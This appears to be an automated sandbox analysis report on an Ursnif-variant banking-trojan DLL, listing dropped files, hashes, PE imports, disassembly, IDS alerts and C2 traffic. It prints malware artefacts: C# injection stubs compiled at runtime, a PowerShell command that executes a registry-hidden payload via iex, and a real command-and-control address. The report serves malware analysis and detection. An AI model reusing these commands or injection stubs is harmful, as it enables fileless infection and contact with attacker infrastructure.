SHA-512:	9688FD347C664335C40C98A3F0F8D8AF75ABA212A75908A96168D3AEBFC2FEAAB25DD62B63233EB70066DD7F8FB297F422871153901142DB6ECD83D1D345E3C2
Malicious:	false
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class stkml. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr xwiefclj,IntPtr fqsexnr,IntPtr ormij);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint llcs,uint flwnybjk,IntPtr coa);.. }..}.

C:\Users\user\AppData\Local\Temp\senxb4p4\senxb4p4.cmdline Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	371
Entropy (8bit):	5.208684268541399
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fj0urOzxs7+AEszI923fj0urYAn:p37Lvkmb6Kz5qWZE25EA
MD5:	A2C75E6B3397E805F89B4EE4DFCC684F
SHA1:	6F019301FD45582550D19067DB378CC576CCF75C
SHA-256:	419083AD47B6C0767556F4E89F30F5FE8476EA0286BF4B3301625CEE4CDDA324
SHA-512:	CB36CE667B1BDF7A4DF248854A30F312157FED5006FD7A61784826A686D527DD8FBE2D0150193EBEDB46A0BD96FFDD0CE85A3471AB8E0201F305A617D79A906C
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\senxb4p4\senxb4p4.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\senxb4p4\senxb4p4.0.cs"

C:\Users\user\AppData\Local\Temp\senxb4p4\senxb4p4.dll Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.5839637117155627
Encrypted:	false
SSDEEP:	24:etGSpW/u2Dg85lxlok3Jgpi24MatkZfy53aUI+ycuZhNeakSGPNnq:6JWb5lxF1eJyN1ulea36q
MD5:	51F37AC01EB40FFD291E58F882000870
SHA1:	ADA69299BE4FEC37E8E12F5BF421441686702300
SHA-256:	9EE9A994172BC44238B38A0D4BBAF215B53CFEE4B326FD448357D30A0628F973
SHA-512:	D05530F481258D71D1415E0E68459244A50ECC564EF725A7DE31F4A2274168D1C9E095E8B5FE2D5F0410047CC866F331F259FBC3AC4AF138CEADA2635121563A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a...........!.................#... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....BSJB............v4.0.30319......l...H...#~......4...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................1....................................................... 8............ E............ X.....P ......c.........i.....r.....z.....................c. ...c...!.c.%...c.......*.....3.+.....8.......E.......X.......................................!........<Module>.senxb4p4.dll.stkml.W32.mscorlib.Sy

C:\Users\user\AppData\Local\Temp\senxb4p4\senxb4p4.out Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	412
Entropy (8bit):	4.871364761010112
Encrypted:	false
SSDEEP:	12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
MD5:	83B3C9D9190CE2C57B83EEE13A9719DF
SHA1:	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
SHA-256:	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
SHA-512:	0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
Malicious:	false
Preview:	Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\vbpfsg54\CSCC3210ABFD4B4742A7EBA7934EB0D0.TMP Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.1064881861518376
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryGlnaak7YnqqFlnrPN5Dlq5J:+RI+ycuZhN2aakSPrPNnqX
MD5:	70C80F166867D56B8A434959D1CB801F
SHA1:	7919DBA8396E74440ED60DAAEAFDBBAA611378D1
SHA-256:	FB18DAF18A1DDBCCB53AB761EA2E6EC665821075A64D28F336E1EFE85AB9BDD8
SHA-512:	DEBB84167186CC8083B2E8E9B5B5207DD18FF7B18B339B24174B15B92F334699B00E0C467749660A5006A115DE1BAF2A794F27DA6EF82CFC9B9468D7C7A6EBA5
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...v.b.p.f.s.g.5.4...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...v.b.p.f.s.g.5.4...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\vbpfsg54\vbpfsg54.0.cs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text
Category:	dropped
Size (bytes):	421
Entropy (8bit):	5.017019370437066
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJzLHMRSRa+eNMjSSRrLypSRHq1oZ6laAkKFM+Qy:V/DTLDfuxLP9eg5rLy4uMaLXjQy
MD5:	7504862525C83E379C573A3C2BB810C6
SHA1:	3C7E3F89955F07E061B21107DAEF415E0D0C5F5E
SHA-256:	B81B8E100611DBCEC282117135F47C781087BD95A01DC5496CAC6BE334A8B0CC
SHA-512:	BC8C4EAD30E12FB619762441B9E84A4E7DF15D23782F80284378129F95FAD5A133D10C975795EEC6DA2564EC4D7F75430C45CA7113A8BFF2D1AFEE0331F13E76
Malicious:	true
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class tjuivx. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint yijswysfmu,uint rpdwbh);.[DllImport("kernel32")].public static extern IntPtr VirtualAllocEx(IntPtr hkhhmwnsoyn,IntPtr xfehjdcey,uint nqamet,uint rvtfunn,uint mlrfbdrm);.. }..}.

C:\Users\user\AppData\Local\Temp\vbpfsg54\vbpfsg54.cmdline Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	371
Entropy (8bit):	5.2422638778527
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fghUBUzxs7+AEszI923fghUbn:p37Lvkmb6Kz4hAUWZE24he
MD5:	58255D7477A3FF5B84067DE41F5313A6
SHA1:	9493F0B985111D0866A1F67A1E7D8AABC754D714
SHA-256:	61EBD9D07AC93AA2AC37C44D25E82C3165209C397D05EEF8E88CA18340CF92D4
SHA-512:	666DC116384C01A160FA3951D5835190EFA93160171833C3FCD5589119E6C481B91A978168174D8945546545064E12CD29289EE19412A2090CC7A0B5A84AE9E5
Malicious:	false
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\vbpfsg54\vbpfsg54.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\vbpfsg54\vbpfsg54.0.cs"

C:\Users\user\AppData\Local\Temp\vbpfsg54\vbpfsg54.dll Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.644600160372739
Encrypted:	false
SSDEEP:	24:etGStWMOWEey8MTz7X8daP0eWQcDdWSWtJ0DtkZf2EBlF7XI+ycuZhN2aakSPrPE:6O7KMTcd6qHWPVJTp1ul2aa3PBq
MD5:	DE4622DEE9424B59FF68344CE7AD6E7D
SHA1:	DF250EF9EA43E4C6AA1820FAD1E04D4CD47AEFD0
SHA-256:	0382BBACA0ADD039C8BD91716A36D996109394146EAFB81A0C6F5F4531A8FE0C
SHA-512:	5583C284FC961E0778FEC2C84477631CABACDDD239F1CFB802FCC2F2A2994CE19700A178D4C10620021E11085302B8BED741C123F0E21D227F3F1DC4F6D75956
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...P...#~......L...#Strings............#US.........#GUID... ...T...#Blob...........G.........%3............................................................2.+...................................................... 9............ K............ S.....P ......b.........h.....s.....z...........................b.!...b...!.b.&...b.......+.....4.A.....9.......K.......S......................................."..........<Module>.vbpfsg54.dll.tjuivx.W32.ms

C:\Users\user\AppData\Local\Temp\vbpfsg54\vbpfsg54.out Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	412
Entropy (8bit):	4.871364761010112
Encrypted:	false
SSDEEP:	12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
MD5:	83B3C9D9190CE2C57B83EEE13A9719DF
SHA1:	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
SHA-256:	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
SHA-512:	0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
Malicious:	false
Preview:	Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\Documents\20210803\PowerShell_transcript.472847.9H_WKwxk.20210803202644.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	978
Entropy (8bit):	5.473629189843555
Encrypted:	false
SSDEEP:	24:BxSAz5DvBBAx2DOXUWOLCHGIYBtBCWrxtHjeTKKjX4CIym1ZJXnOLCHGIYBtBW:BZ9v/AoORFeVltqDYB1ZvFeW
MD5:	42DA98A9FD82DEF2CF3D350E65B30F72
SHA1:	6019A89197EAD8EDD2D17B0C89470937F6A03067
SHA-256:	D4FCC50049C43966D3601506B107F1D0ED02D92F2014ADD7186495B7AD9947F8
SHA-512:	1CAE283425DC4FA5D6B9D43BC3A737463761361FEBEC9BF07957FE91173929A66D02BFF4405EE628560C20061393860C20FB0F23D7361903AFE39E41540BDD25
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210803202645..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 472847 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).UtilTool))..Process ID: 6052..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210803202645..********************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).UtilTool))..

C:\Users\user\Documents\20210803\PowerShell_transcript.472847.skhGMmiY.20210803202633.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	978
Entropy (8bit):	5.472136750784817
Encrypted:	false
SSDEEP:	24:BxSA4DvBBAx2DOXUWOLCHGIYBtBCW8HjeTKKjX4CIym1ZJXC3OLCHGIYBtBW:BZUv/AoORFeV8qDYB1Z4BFeW
MD5:	4A17FFA119893EA70D54200D26F18DBE
SHA1:	94AF1EAE538EFBD5DFDDC3E8D5B6EB2DF337486B
SHA-256:	A0D609C185BC508E481DCA4017C15C284F30F616AA8260E08BD9F69204F639F6
SHA-512:	7E0FE38415ED90EDD081CC8D36C72E0BC498883E2C2C3758DF88BD74734A01FBA4663EB2C8EDF096F2533B2F5D6DACBC5103C81381B425F87919B7E564F105B1
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210803202633..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 472847 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).UtilTool))..Process ID: 5708..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210803202633..********************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).UtilTool))..

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.431123597078835
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	worVoBJYGD.dll
File size:	805376
MD5:	2f3c83a9b7d37b99c603a28d09c74cc6
SHA1:	697235d82ea9218b2349cb1055276a1ebe96aefd
SHA256:	68ab9c658f136782ec8e341d0ad8257989689882cfc03db4cdf719b3a68c8e85
SHA512:	5ee521d78ad7ebdd46e29884e3241be3cc0f32b6c461c8ffdc7f7358bd4736bde0597d1ca8dc010d420d4053239f0e8ae06aab53cbaaf66b1b4f10902552167c
SSDEEP:	12288:UQvWGTLtCQBI4/JCx4EVwUsqx8cx6QVMO207bJ9xjYxYW5xrwythebCG6Qdk49ki:RI4/e4Eu/+x6TmKfheO4w
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h...,...,...,....z../...2.0.*.....5.-...2.6.<...2. ."...2.'.$....z..+...,...i...2.,.....2.1.-...2.7.-...2.2.-...Rich,..........

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x4107d0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE
Time Stamp:	0x4A6884DA [Thu Jul 23 15:42:18 2009 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	3e7e5401ff9718dfa420098d2c9e79a8

Entrypoint Preview

Instruction
mov edi, edi
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007FF0349E3C07h
call 00007FF0349F60E5h
mov eax, dword ptr [ebp+10h]
push eax
mov ecx, dword ptr [ebp+0Ch]
push ecx
mov edx, dword ptr [ebp+08h]
push edx
call 00007FF0349E3C14h
add esp, 0Ch
pop ebp
retn 000Ch
int3
int3
int3
int3
int3
int3
int3
int3
mov edi, edi
push ebp
mov ebp, esp
push FFFFFFFEh
push 004BCE98h
push 0041ADD0h
mov eax, dword ptr fs:[00000000h]
push eax
add esp, FFFFFFE8h
push ebx
push esi
push edi
mov eax, dword ptr [004BF704h]
xor dword ptr [ebp-08h], eax
xor eax, ebp
push eax
lea eax, dword ptr [ebp-10h]
mov dword ptr fs:[00000000h], eax
mov dword ptr [ebp-18h], esp
mov dword ptr [ebp-1Ch], 00000001h
cmp dword ptr [ebp+0Ch], 00000000h
jne 00007FF0349E3C12h
cmp dword ptr [004C0BE0h], 00000000h
jne 00007FF0349E3C09h
xor eax, eax
jmp 00007FF0349E3D53h
mov dword ptr [ebp-04h], 00000000h
cmp dword ptr [ebp+0Ch], 01h
je 00007FF0349E3C08h
cmp dword ptr [ebp+0Ch], 02h
jne 00007FF0349E3C56h
cmp dword ptr [00451FE8h], 00000000h
je 00007FF0349E3C17h
mov eax, dword ptr [ebp+10h]
push eax
mov ecx, dword ptr [ebp+0Ch]
push ecx
mov edx, dword ptr [ebp+08h]
push edx
call dword ptr [00451FE8h]
mov dword ptr [ebp-1Ch], eax
cmp dword ptr [ebp-1Ch], 00000000h
je 00007FF0349E3C16h
mov eax, dword ptr [ebp+10h]
push eax
mov ecx, dword ptr [ebp+0Ch]
push ecx
mov edx, dword ptr [ebp+08h]
push edx
call 00007FF0349F396Bh

Rich Headers

Programming Language:

[ C ] VS2008 build 21022
[LNK] VS2008 build 21022
[ C ] VS2005 build 50727
[ASM] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[C++] VS2008 build 21022
[IMP] VS2008 build 21022
[EXP] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0xbeb50	0x68	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbde5c	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xd8000	0x2e30	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x502d0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xbbf78	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x50000	0x244	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4ee51	0x4f000	False	0.551179910008	data	6.34788700051	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x50000	0x6ebb8	0x6ec00	False	0.656847400536	data	5.64885561071	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbf000	0x18b68	0x1a00	False	0.324368990385	data	3.70391917848	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc	0xd8000	0x4fbe	0x5000	False	0.465673828125	data	4.75949469628	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
KERNEL32.dll	GetCurrentThread, GetExitCodeProcess, GetFileAttributesW, GetModuleFileNameW, OpenMutexW, VirtualProtectEx, ResetEvent, DuplicateHandle, ReleaseMutex, GetWindowsDirectoryW, DeleteFileW, CreateProcessW, CreateFileA, GetConsoleOutputCP, WriteConsoleA, SetStdHandle, GetLocaleInfoW, LoadLibraryA, InitializeCriticalSectionAndSpinCount, PeekNamedPipe, FindFirstChangeNotificationW, CreateMutexW, GetEnvironmentVariableW, CloseHandle, SetFilePointer, ReadFile, VirtualAlloc, HeapReAlloc, HeapSize, HeapAlloc, GetConsoleMode, GetConsoleCP, FlushFileBuffers, GetSystemTimeAsFileTime, GetCurrentProcessId, GetTickCount, QueryPerformanceCounter, VirtualFree, HeapFree, HeapCreate, HeapDestroy, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetEnvironmentStrings, FreeEnvironmentStringsA, GetModuleFileNameA, GetStartupInfoA, WideCharToMultiByte, InterlockedIncrement, InterlockedDecrement, MultiByteToWideChar, InterlockedCompareExchange, InterlockedExchange, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetCurrentThreadId, GetCommandLineA, GetCPInfo, HeapValidate, IsBadReadPtr, RaiseException, RtlUnwind, LCMapStringW, LCMapStringA, GetLastError, GetStringTypeW, GetProcAddress, TlsGetValue, GetModuleHandleW, TlsAlloc, TlsSetValue, TlsFree, SetLastError, DebugBreak, GetStdHandle, WriteFile, OutputDebugStringA, WriteConsoleW, GetFileType, OutputDebugStringW, ExitProcess, LoadLibraryW, GetACP, GetOEMCP, IsValidCodePage, GetStringTypeA, GetLocaleInfoA, IsValidLocale, EnumSystemLocalesA, GetUserDefaultLCID, SetHandleCount, GetModuleHandleA
USER32.dll	GetWindowTextLengthW, DispatchMessageA, FrameRect, GetSysColorBrush, CreatePopupMenu, SystemParametersInfoW, CreateDialogIndirectParamW, RegisterClassExW, GetForegroundWindow, GetClientRect, DialogBoxIndirectParamW, ScreenToClient, GetWindowRect, ClientToScreen
GDI32.dll	ScaleViewportExtEx, SetViewportExtEx, OffsetViewportOrgEx, SetWindowExtEx
WS2_32.dll	gethostbyname, socket, WSACleanup, setsockopt, shutdown, getsockname, WSAStartup, gethostname, sendto
WTSAPI32.dll	WTSCloseServer, WTSQueryUserToken, WTSOpenServerW
UxTheme.dll	CloseThemeData, GetThemeFont
Secur32.dll	InitializeSecurityContextW, AcquireCredentialsHandleW, FreeContextBuffer, QueryContextAttributesW, FreeCredentialsHandle, DeleteSecurityContext

Exports

Name	Ordinal	Address
Chartthird	1	0x44a280
Heavybaby	2	0x44a640
Right	3	0x44a160

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
08/03/21-20:26:22.893518	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49722	80	192.168.2.5	185.228.233.17
08/03/21-20:26:22.893518	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49722	80	192.168.2.5	185.228.233.17
08/03/21-20:26:24.097242	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49723	80	192.168.2.5	185.228.233.17
08/03/21-20:26:24.097242	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49723	80	192.168.2.5	185.228.233.17
08/03/21-20:26:25.371168	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49724	80	192.168.2.5	185.228.233.17
08/03/21-20:26:25.371168	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49724	80	192.168.2.5	185.228.233.17
08/03/21-20:26:33.906870	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49725	80	192.168.2.5	185.228.233.17
08/03/21-20:26:35.523715	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49726	80	192.168.2.5	185.228.233.17
08/03/21-20:26:35.523715	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49726	80	192.168.2.5	185.228.233.17
08/03/21-20:26:37.072709	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49727	80	192.168.2.5	185.228.233.17
08/03/21-20:26:37.072709	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49727	80	192.168.2.5	185.228.233.17
08/03/21-20:27:49.690336	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49738	80	192.168.2.5	185.228.233.17
08/03/21-20:27:49.690336	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49738	80	192.168.2.5	185.228.233.17

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 3, 2021 20:26:22.832674026 CEST	49722	80	192.168.2.5	185.228.233.17
Aug 3, 2021 20:26:22.892426968 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:22.892769098 CEST	49722	80	192.168.2.5	185.228.233.17
Aug 3, 2021 20:26:22.893517971 CEST	49722	80	192.168.2.5	185.228.233.17
Aug 3, 2021 20:26:22.993465900 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.422147989 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.422179937 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.422245026 CEST	49722	80	192.168.2.5	185.228.233.17
Aug 3, 2021 20:26:23.423094034 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.423137903 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.423229933 CEST	49722	80	192.168.2.5	185.228.233.17
Aug 3, 2021 20:26:23.425471067 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.425501108 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.425604105 CEST	49722	80	192.168.2.5	185.228.233.17
Aug 3, 2021 20:26:23.427911997 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.427941084 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.427999973 CEST	49722	80	192.168.2.5	185.228.233.17
Aug 3, 2021 20:26:23.430599928 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.430629015 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.430711031 CEST	49722	80	192.168.2.5	185.228.233.17
Aug 3, 2021 20:26:23.480021954 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.480102062 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.480142117 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.480180025 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.480266094 CEST	49722	80	192.168.2.5	185.228.233.17
Aug 3, 2021 20:26:23.480293989 CEST	49722	80	192.168.2.5	185.228.233.17
Aug 3, 2021 20:26:23.480760098 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.480809927 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.480853081 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.480891943 CEST	80	49722	185.228.233.17	192.168.2.5
Aug 3, 2021 20:26:23.480895042 CEST	49722	80	192.168.2.5	185.228.233.17
Aug 3, 2021 20:26:23.480950117 CEST	49722	80	192.168.2.5	185.228.233.17
Aug 3, 2021 20:26:23.483225107 CEST	80	49722	185.228.233.17	192.168.2.5
